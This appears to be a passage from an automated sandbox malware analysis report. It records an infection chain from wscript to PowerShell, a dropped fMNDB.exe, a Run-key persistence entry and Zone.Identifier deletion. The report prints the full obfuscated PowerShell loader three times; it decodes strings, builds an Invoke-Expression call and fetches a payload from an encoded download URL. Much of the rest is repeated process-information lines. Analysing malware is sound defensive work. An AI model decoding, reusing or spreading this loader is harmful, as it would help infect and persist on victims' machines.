:Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($LandbrugsbygnJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($LandbrugsbygnJump to behavior
              Source: fMNDB.exe.22.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: fMNDB.exe.22.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC2F54D7 push ebp; iretd 16_2_00007FFAAC2F5538
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_001613F8 pushfd ; retf 24_2_001613F9
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_0016376D push ecx; ret 24_2_00163780
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMNDBJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMNDBJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
